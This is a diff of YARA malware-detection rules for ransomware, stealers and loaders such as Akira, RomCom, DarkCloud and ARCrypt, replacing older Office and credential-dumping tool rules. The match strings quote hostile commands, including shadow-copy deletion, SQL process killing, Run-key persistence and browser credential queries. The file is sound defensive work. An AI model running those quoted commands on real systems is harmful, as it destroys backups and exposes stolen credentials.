+		$x4 = "novagroup@onionmail.org" ascii nocase
+		$x5 = "# Nova Group" ascii
+		$f1 = "main.HaveRun" ascii
+		$f2 = "main.FindFile" ascii
+		$f3 = "main.deriveKey" ascii
+		$f4 = "main.Pwd" fullword ascii
+		$f5 = "/ClearBashFile" ascii
+		$f6 = "/ClearUserTempFiles" ascii
+		$f7 = "/KillProccess" ascii
+		$f8 = "/Encryptor" ascii
+		$f9 = "/NoDirEncrypt" ascii
+		$f10 = "/RunCmdEexecutable" ascii
+		$f11 = "/StopImportantServices" ascii
+		$f12 = "/GetPwd" ascii
+		$s1 = "\\$Recycle.Bin"
+		$s2 = ".README.txt"
+		$s3 = "\\BRSPATH.exe"
+		$s4 = "taskkill /F /IM sql*"
+		$s5 = "C:\\inetpub\\logs\\"
+		$s6 = "shutdown /r"
+		$s7 = ":\\Program Files\\VMware\\"
+		$s8 = "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Message /t REG_SZ /d"
+		$s9 = "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v DelLogSoft /t REG_SZ /d"
 
 	condition:
-		( uint16( 0 ) == 0xcfd0 or uint32( 0 ) == 0x74725c7b or uint32( 0 ) == 0x46445025 or uint32( 0 ) == 0x6d783f3c ) and 2 of them
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 7 of ( $f* ) or ( 1 of ( $x* ) and ( 5 of ( $f* ) or 5 of ( $s* ) ) ) or ( 6 of ( $f* ) and 4 of ( $s* ) ) or 12 of them )
 }
-rule DITEKSHEN_INDICATOR_OOXML_Excel4Macros_EXEC : FILE
+rule DITEKSHEN_MALWARE_Win_Akira : FILE
 {
 	meta:
-		description = "Detects OOXML (decompressed) documents with Excel 4 Macros XLM macrosheet"
+		description = "Detects Akira Ransomware Windows"
 		author = "ditekSHen"
-		id = "674ef310-d3bc-5e15-862f-29aa111becb3"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "350ecf81-7926-5cd2-b0c8-2dd748775e74"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L885-L898"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10220-L10243"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ab3994e4082390f65d030db0b898a20df1d7e4b0ca2fdedc7a9d0f1480fd0334"
+		logic_hash = "73dd0a1b21be8ff7362536f6b6255cd19510632782effd67a56d7656bebf04ff"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		clamav_sig = "INDICATOR.OOXML.Excel4MacrosEXEC"
 
 	strings:
-		$ms = "<xm:macrosheet" ascii nocase
-		$s1 = ">FORMULA.FILL(" ascii nocase
-		$s2 = ">REGISTER(" ascii nocase
-		$s3 = ">EXEC(" ascii nocase
-		$s4 = ">RUN(" ascii nocase
+		$x1 = "https://akira" ascii
+		$x2 = ":\\akira\\" ascii
+		$x3 = ".akira" ascii
+		$x4 = "akira_readme.txt" ascii
+		$x5 = "\\akira\\asio\\include\\asio\\impl\\co_spawn.hpp" ascii
+		$s1 = "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject" ascii
+		$s2 = "Win32_ProcessStartup" fullword wide
+		$s3 = /Failed\sto\smake\s(part|full|spot)\sencrypt/ ascii wide
+		$s4 = "--encryption_" ascii
+		$s5 = "--share_file" ascii
+		$s6 = { 24 00 52 00 45 00 43 00 59 00 43 00 4C 00 45 00 2E 00 42 00 49 00 4E 00 00 00 00 00 6? 6? 6? 00 (24|57) 00 (52|69) 00 }
+		$s7 = " PUBLIC KEY-----" ascii
+		$s8 = ".onion" ascii
+		$s9 = "/Esxi_Build_Esxi6/./" ascii nocase
+		$s10 = "No path to encrypt" ascii
+		$s11 = "-fork" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x6d783f3c and $ms and ( 2 of ( $s* ) or ( $s3 ) )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or ( 1 of ( $x* ) and 4 of ( $s* ) ) or 6 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_OOXML_Excel4Macros_Autoopenhidden : FILE
+rule DITEKSHEN_MALWARE_Linux_Akira : FILE
 {
 	meta:
-		description = "Detects OOXML (decompressed) documents with Excel 4 Macros XLM macrosheet auto_open and state hidden"
+		description = "Detects Akira Ransomware Linux"
 		author = "ditekSHen"
-		id = "c5aab620-5254-5fc6-b236-4fe0f69cbd8e"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		id = "3ac144b3-c747-58e5-bc75-b3f90786f404"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L900-L910"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10245-L10264"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a93d8aa7ac025a0c2e8a9ac833f6d4c3cd3769ffca3f87455f43411d0021e828"
+		logic_hash = "3a00154e1cfc442718e753641d3706ffd4dd8465525d0bb2854f74dfb1cf5dd0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav_sig = "INDICATOR.OOXML.Excel4MacrosEXEC"
 
 	strings:
-		$s1 = "state=\"veryhidden\"" ascii nocase
-		$s2 = "<definedName name=\"_xlnm.Auto_Open" ascii nocase
+		$x1 = "https://akira" ascii
+		$x2 = ":\\akira\\" ascii
+		$x3 = ".akira" ascii
+		$x4 = "akira_readme.txt" ascii
+		$s1 = "--encryption_" ascii
+		$s2 = "--share_file" ascii
+		$s3 = { 00 24 52 65 63 79 63 6c 65 2e 42 69 6e 00 24 52 45 43 59 43 4c 45 2e 42 49 4e 00 }
+		$s4 = " PUBLIC KEY-----" ascii
+		$s5 = ".onion" ascii
+		$s6 = "/Esxi_Build_Esxi6/./" ascii nocase
+		$s7 = "No path to encrypt" ascii
+		$s8 = "-fork" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x6d783f3c and all of them
+		uint16( 0 ) == 0x457f and ( 3 of ( $x* ) or ( 1 of ( $x* ) and 4 of ( $s* ) ) or 6 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_SUSPICOIUS_RTF_Encodedurl : FILE
+
+rule DITEKSHEN_MALWARE_Win_Romcom_Loader : FILE
 {
 	meta:
-		description = "Detects executables calling ClearMyTracksByProcess"
-		author = "ditekSHen"
-		id = "6b3f0434-24b2-5ae8-a6fc-c0fdded4996f"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		description = "Hunt for RomCom loader"
+		author = "ditekShen"
+		id = "49a5398a-e28d-51e2-90d5-479d815f9967"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L930-L941"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10291-L10307"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cb791bb5e2af46ff9f1f07cef33bbd51edc44b2394d6f3eff31d39eaa5ff2a33"
+		logic_hash = "7aef88aa9f201c3a1852d63b17c14e44c7c2a7dfe94a9bc77897a4aa0eb97486"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
-	strings:
-		$s1 = "\\u-65431?\\u-65419?\\u-65419?\\u-65423?\\u-" ascii wide
-		$s2 = "\\u-65432?\\u-65420?\\u-65420?\\u-65424?\\u-" ascii wide
-		$s3 = "\\u-65433?\\u-65430?\\u-65427?\\u-65434?\\u-" ascii wide
-		$s4 = "\\u-65434?\\u-65431?\\u-65428?\\u-65435?\\u-" ascii wide
-
 	condition:
-		uint32( 0 ) == 0x74725c7b and any of them
+		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and ( pe.exports ( "DllCanUnloadNow" ) and pe.exports ( "DllGetClassObject" ) and pe.exports ( "DllRegisterServer" ) and pe.exports ( "DllUnregisterServer" ) and pe.exports ( "GetProxyDllInfo" ) ) and for any fn in pe.export_details : ( fn.forward_name contains "Dll" )
 }
-rule DITEKSHEN_INDICATOR_RTF_Remotetemplate : CVE_2017_11882 FILE
+
+rule DITEKSHEN_MALWARE_Win_Romcom_Worker : FILE
 {
 	meta:
-		description = "Detects RTF documents potentially exploiting CVE-2017-11882"
-		author = "ditekSHen"
-		id = "59b31243-a360-531f-99ea-32b54d19ab52"
-		date = "2024-09-06"
-		modified = "2024-09-06"
+		description = "Hunt for RomCom worker"
+		author = "ditekShen"
+		id = "ce545a33-731c-5ecd-b02e-cedf24f75cc7"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L943-L953"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10309-L10322"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3a75072bc4d9c7dc53220afe359911c04cd3267c142058352de80ec430a53517"
-		score = 60
-		quality = 35
-		tags = "CVE-2017-11882, FILE"
+		logic_hash = "488db046458585882a4709438042b57e02d7dbc06483fdfdfc463a64ee8db203"
+		score = 75
+		quality = 73
+		tags = "FILE"
 
 	strings:
-		$s1 = "{\\*\\template http" ascii nocase
-		$s2 = "{\\*\\template file" ascii nocase
-		$s3 = "{\\*\\template \\u-" ascii nocase
+		$s1 = "UpdateProcThreadAttribute" fullword ascii
+		$s2 = "WriteFile" fullword ascii
+		$s3 = "GetAdaptersAddresses" fullword ascii nocase
+		$s4 = /inflate\s\d+\.\d+\.\d+\sCopyright/ ascii
+		$s5 = "SetHandleInformation" fullword ascii
+		$s6 = "PeekNamedPipe" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x74725c7b and 1 of them
+		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and pe.number_of_exports == 1 and pe.exports ( "Main" ) and all of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Lazagne : FILE
+
+rule DITEKSHEN_MALWARE_Win_Romcom_Dropper : FILE
 {
 	meta:
-		description = "Detects LaZagne post-exploitation password stealing tool. It is typically embedded with malware in the binary resources."
-		author = "ditekSHen"
-		id = "68bc50b0-a64f-50b6-bfbf-a26a4d0970ef"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Hunt for RomCom worker"
+		author = "ditekShen"
+		id = "1b77122d-95d7-535d-897e-b542da17f499"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L3-L20"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10324-L10335"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "af4427174c1026204dc9c71878c5125efdf190328840b65fe4a69277a16fe7d2"
+		logic_hash = "89f62f71e5870c1e5d14bc32dd3508da620f5fa85494251c69682eb09d630029"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "blaZagne.exe.manifest" fullword ascii
-		$S2 = "opyi-windows-manifest-filename laZagne.exe.manifest" fullword ascii
-		$s3 = "lazagne.softwares.windows." ascii
-		$s4 = "lazagne.softwares.sysadmin." ascii
-		$s5 = "lazagne.softwares.php." ascii
-		$s6 = "lazagne.softwares.memory." ascii
-		$s7 = "lazagne.softwares.databases." ascii
-		$s8 = "lazagne.softwares.browsers." ascii
-		$s9 = "lazagne.config.write_output(" fullword ascii
-		$s10 = "lazagne.config." ascii
+		$s1 = "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes" wide nocase
+		$s2 = "\\REGISTRY\\USER" wide nocase
+		$s3 = "BINARY" fullword wide
+		$s4 = "POST" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and any of them
+		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and pe.number_of_exports == 1 and pe.exports ( "Main" ) and 3 of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Credstealer : FILE
+
+rule DITEKSHEN_MALWARE_Win_STEALDEAL : FILE
 {
 	meta:
-		description = "Detects Python executable for stealing credentials including domain environments. Observed in MuddyWater."
-		author = "ditekSHen"
-		id = "ab587b12-f3e1-5f08-b27c-03ee9752e513"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Hunt for STEALDEAL stealer"
+		author = "ditekShen"
+		id = "4685fea3-4050-5395-af2b-cb0ba4104b47"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L22-L41"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10337-L10348"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e729c8b0b1db642acabbc4590833c05ce81447bb89e5f40aea5f0b8ebdee4438"
+		logic_hash = "366c33b06ed9403b2b840d98e25287333eb52f2588f747981b3c0c3baf4fd27a"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 
 	strings:
-		$s1 = "PYTHON27.DLL" fullword wide
-		$s2 = "C:\\Python27\\lib\\site-packages\\py2exe\\boot_common.pyR" fullword ascii
-		$s3 = "C:\\Python27\\lib\\site-packages\\py2exe\\boot_common.pyt" fullword ascii
-		$s4 = "subprocess.pyc" fullword ascii
-		$s5 = "MyGetProcAddress(%p, %p(%s)) -> %p" fullword ascii
-		$p1 = "Dump SAM hashes from target systemss" fullword ascii
-		$p2 = "Dump LSA secrets from target systemss" fullword ascii
-		$p3 = "Dump the NTDS.dit from target DCs using the specifed method" fullword ascii
-		$p4 = "Dump NTDS.dit password historys" fullword ascii
-		$p5 = "Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameterss" fullword ascii
-		$p6 = "Retrieve plaintext passwords and other information for accounts pushed through Group Policy Preferencess" fullword ascii
-		$p7 = "Combo file containing a list of domain\\username:password or username:password entriess" fullword ascii
+		$x1 = "stealDll.dll" fullword ascii
+		$s1 = "SqlExec" fullword ascii
+		$s2 = "etilqs_" fullword ascii
+		$s3 = "SUBQUERY %u" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) and 1 of ( $p* ) )
+		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and pe.exports ( "stub" ) and ( 1 of ( $x* ) or all of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_CNC_Shootback : FILE
+rule DITEKSHEN_MALWARE_Win_Darkcloud : FILE
 {
 	meta:
-		description = "detects Python executable for CnC communication via reverse tunnels. Used by MuddyWater group."
+		description = "Detects DarkCloud infostealer"
 		author = "ditekSHen"
-		id = "fb608115-6d9f-5640-88be-674e53b07126"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "e29e1dc7-87b8-5d6b-b73b-460dc2530875"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L43-L62"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10350-L10371"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "996cabd4965164cb844cee1ab1e2894fc2b4fac14d4e660c456b494c5cbd0688"
+		logic_hash = "7826cc4185d6edb760d062019e0fa30f800c34e5fb4b0eedcfb17081e6c7643d"
 		score = 75
-		quality = 50
+		quality = 48
 		tags = "FILE"
 
 	strings:
-		$s1 = "PYTHON27.DLL" fullword wide
-		$s2 = "C:\\Python27\\lib\\site-packages\\py2exe\\boot_common.pyR" fullword ascii
-		$s3 = "C:\\Python27\\lib\\site-packages\\py2exe\\boot_common.pyt" fullword ascii
-		$s4 = "subprocess.pyc" fullword ascii
-		$s5 = "MyGetProcAddress(%p, %p(%s)) -> %p" fullword ascii
-		$p1 = "Slaver(this pc):" ascii
-		$p2 = "Master(another public server):" ascii
-		$p3 = "Master(this pc):" ascii
-		$p4 = "running as slaver, master addr: {} target: {}R/" fullword ascii
-		$p5 = "Customer(this pc): " ascii
-		$p6 = "Customer(any internet user):" ascii
-		$p7 = "the actual traffic is:  customer <--> master(1.2.3.4) <--> slaver(this pc) <--> ssh(this pc)" fullword ascii
+		$x1 = "=DARKCLOUD=" wide
+		$x2 = "#DARKCLOUD#" wide
+		$x3 = "DARKCLOUD" wide
+		$s1 = "DC-Creds" fullword wide
+		$s2 = "shell.application" fullword wide
+		$s3 = "VBSQLite3.dll" ascii wide nocase
+		$s4 = "getbinaryvalue" fullword wide
+		$s5 = "sqlite_exec" fullword ascii
+		$i1 = "RegWrite" fullword wide
+		$i2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
+		$i3 = "\\Templates\\Stub\\Project" wide
+		$i4 = "\\Credentials" wide
+		$i5 = "SELECT " wide
+		$i6 = "\\163MailContacts.txt" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) and 2 of ( $p* ) )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and ( 3 of ( $s* ) or 3 of ( $i* ) ) ) or ( all of ( $s* ) and 1 of ( $i* ) ) or ( 4 of ( $s* ) and 4 of ( $i* ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Fgdump : FILE
+rule DITEKSHEN_MALWARE_Win_Arcrypt : FILE
 {
 	meta:
-		description = "detects all versions of the password dumping tool, fgdump. Observed to be used by DustSquad group."
+		description = "Detects ARCrypt / ChileLocker ransomware"
 		author = "ditekSHen"
-		id = "2759fce2-db2a-5a48-bb37-931fd847a32d"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "a53bbae6-a321-549d-9d45-e1a408d08740"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L64-L81"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10373-L10399"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fdccd91a84374f7c94843bd9c2191720959416acf2e33d7b28b42d63d7ea4ce3"
+		logic_hash = "cc9fa68d093fdf9745a06beb28e29108cb2ba846122ce097ad892213b1edba25"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "dumping server %s" ascii
-		$s2 = "dump on server %s" ascii
-		$s3 = "dump passwords: %s" ascii
-		$s4 = "Dumping cache" nocase ascii
-		$s5 = "SECURITY\\Cache" ascii
-		$s6 = "LSASS.EXE process" ascii
-		$s7 = " AntiVirus " nocase ascii
-		$s8 = " IPC$ " ascii
-		$s9 = "Exec failed, GetLastError returned %d" fullword ascii
-		$10 = "writable connection to %s" ascii
+		$c1 = "readme_for_unlock.txt" wide
+		$c2 = "vssadmin.exe delete shadows /all /quiet" wide
+		$c3 = "START /b \"\" cmd /c wmic /node:" wide
+		$c4 = "START /b \"\" cmd /c DEL \"" wide
+		$c5 = "process call create cmd /c START" wide
+		$c6 = "net config server /autodisconnect:" wide
+		$c7 = "/NOBREAK>NUL) ELSE (START /b \"\" cmd /c DEL \"%~f" ascii
+		$c8 = ":\\_ARC\\_WorkSolution\\cryptopp" ascii
+		$e1 = /\.crYpt([A-F]{0,1}(\d+)?)?/ fullword wide
+		$e2 = ".dnt___.crYpt" wide nocase
+		$s1 = "create_directory" fullword ascii
+		$s2 = "create_directories" fullword ascii
+		$s3 = "NoClose" fullword ascii
+		$s4 = "StartMenuLogOff" fullword ascii
+		$s5 = "NoLogOff" fullword ascii
+		$s6 = "DisableTaskMgr" fullword ascii
+		$s7 = "DisableChangePassword" fullword ascii
+		$s8 = "HideFastUserSwitching" fullword ascii
+		$s9 = "RemotePath" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $c* ) or 7 of ( $s* ) or ( 3 of ( $c* ) and 4 of ( $s* ) ) or ( 1 of ( $e* ) and ( 1 of ( $c* ) and 1 of ( $s* ) ) ) or ( all of ( $e* ) and ( 1 of ( $c* ) or 1 of ( $s* ) ) ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Sharpweb : FILE
+rule DITEKSHEN_MALWARE_Win_Rootteamstealer : FILE
 {
 	meta:
-		description = "detects all versions of the browser password dumping .NET tool, SharpWeb."
+		description = "Detects RootTeam infostealer"
 		author = "ditekSHen"
-		id = "f85dd689-c2a9-5cea-9c19-1e66ec942606"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "3b57ff3e-09cf-52be-ac7f-45ee832d70ab"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L83-L110"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10401-L10417"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "036d576eb7acdededda7b31d3dda3a4928e01ff761bf45a1112da6bf7d4e2966"
+		logic_hash = "d1693865253067527d58c980653d550b55d022d5a394b88090a958e5d5818143"
 		score = 75
-		quality = 40
+		quality = 50
 		tags = "FILE"
 
 	strings:
-		$param1 = "logins" nocase wide
-		$param2 = "cookies" nocase wide
-		$param3 = "edge" nocase wide
-		$param4 = "firefox" nocase wide
-		$param5 = "chrome" nocase wide
-		$path1 = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" wide
-		$path2 = "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" wide
-		$path3 = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" wide
-		$path4 = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks" wide
-		$sql1 = "UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;" nocase wide
-		$sql2 = "UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d" nocase wide
-		$sql3 = "SELECT action_url, username_value, password_value FROM logins" nocase wide
-		$func1 = "get_encryptedPassword" fullword ascii
-		$func2 = "<GetLogins>g__GetVaultElementValue0_0" fullword ascii
-		$func3 = "<encryptedPassword>k__BackingField" fullword ascii
-		$pdb = "\\SharpWeb\\obj\\Debug\\SharpWeb.pdb" fullword ascii
+		$x1 = "RootTeamStl" ascii
+		$x2 = "Bot: https://t.me/rootteam_bot" ascii
+		$x3 = "rootteam_bot" ascii
+		$x4 = "Root Team" ascii
+		$s1 = "-ldflags=\"-s -w -H windowsgui -X" ascii
+		$s2 = "'RootTeamStl/vars." ascii
+		$s3 = "{ Hostname string \"json:\\\"hostname\\\"\"; EncryptedUsername string \"json:\\\"encryptedUsername\\\"\"; EncryptedPassword string \"json:\\\"encryptedPassword\\\"\" }" ascii
+		$s4 = "\\Program Files (x86)\\Steam\\config\\loginusers.vdf" ascii
+		$s5 = /RootTeamStl\/managers\/(browser|coldwallets|discord|filegrabber|steam|userinformation)?/ ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $func* ) and 3 of ( $param* ) and ( 1 of ( $path* ) or 1 of ( $sql* ) ) ) or $pdb )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or 4 of ( $s* ) or 5 of them )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Blackbone : FILE
+rule DITEKSHEN_MALWARE_Win_Espioloader : FILE
 {
 	meta:
-		description = "detects Blackbone password dumping tool on Windows 7-10 operating system."
+		description = "Detects Espio loader and obfuscator"
 		author = "ditekSHen"
-		id = "a6d9f9d1-75fb-51af-87ad-80b4e135e759"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "fb2be984-abd6-5f71-b448-d41c9c3e35c5"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L112-L129"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10438-L10451"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e9dacd28accaef8a93ff8d3b5cf9437b3848791711a4a7118ab46d2bb6ca42d3"
+		logic_hash = "8ad77a50db48f12e6f6465652b24fc1daa56375bb27e37e0eead1bea55b89e0c"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		clamav_sig = "MALWARE.Win.EspioLoader"
 
 	strings:
-		$s1 = "BlackBone: %s: " ascii
-		$s2 = "\\BlackBoneDrv\\" ascii
-		$s3 = "\\DosDevices\\BlackBone" fullword wide
-		$s4 = "\\Temp\\BBImage.manifest" wide
-		$s5 = "\\Device\\BlackBone" fullword wide
-		$s6 = "BBExecuteInNewThread" fullword ascii
-		$s7 = "BBHideVAD" fullword ascii
-		$s8 = "BBInjectDll" fullword ascii
-		$s9 = "ntoskrnl.exe" fullword ascii
-		$s10 = "WDKTestCert Ton," ascii
+		$pdb = /\\loader\\x64\\(Release|Debug)\\Espio\.pdb/ ascii
+		$s1 = "obfuscatedPayload" fullword wide
+		$s2 = "OBFUSCATEDPAYLOAD" fullword wide
+		$s3 = "\\??\\C:\\Windows\\System32\\werfault.exe" fullword wide
+		$s4 = "C:\\windows\\system32\\ntdll.dll" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and ( $pdb or 3 of ( $s* ) )
 }
-rule DITEKSHEN_INDICATOR_TOOL_PWS_Mimikatz : FILE
+rule DITEKSHEN_MALWARE_Win_Celestybinderloader : FILE
 {
 	meta:
-		description = "Detects Mimikatz"
+		description = "Detects Celesty Binder loader"
 		author = "ditekSHen"
-		id = "feb236c0-6e0d-5c2c-a050-cf1d000aaf38"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		id = "9c3404b7-311c-565d-b0fa-cfa80ba97289"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L131-L164"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10453-L10466"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "42c9c78c88bb7c427d5f0bf1d3b0113205780142b499eb17858037ded0f2971e"
+		logic_hash = "8c9ffd48c9c8cd345dccfb48bcb345282f9978f7cf906a61e2ea81c48486b16d"
 		score = 75
-		quality = 48
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "mimilib.dll" ascii
-		$s2 = "mimidrv.sys" ascii
-		$s3 = "mimikatz.exe" ascii
-		$s4 = "\\mimidrv.pdb" ascii
-		$s5 = "mimikatz" ascii
-		$s6 = { 6d 00 69 00 6d 00 69 00 6b 00 61 00 74 00 7a }
-		$s7 = { 5c 00 6d 00 69 00 6d 00 69 00 64 00 72 00 76 }
-		$s8 = { 6d 00 69 00 6d 00 69 00 64 00 72 00 76 }
-		$s9 = "Lecture KIWI_MSV1_0_" ascii
-		$s10 = "Search for LSASS process" ascii
-		$f1 = "SspCredentialList" ascii
-		$f2 = "KerbGlobalLogonSessionTable" ascii
-		$f3 = "LiveGlobalLogonSessionList" ascii
-		$f4 = "TSGlobalCredTable" ascii
-		$f5 = "g_MasterKeyCacheList" ascii
-		$f6 = "l_LogSessList" ascii
-		$f7 = "lsasrv!" ascii
-		$f8 = "SekurLSA" ascii
-		$f9 = /Cached(Unlock|Interative|RemoteInteractive)/ ascii
-		$dll_1 = { c7 0? 00 00 01 00 [4-14] c7 0? 01 00 00 00 }
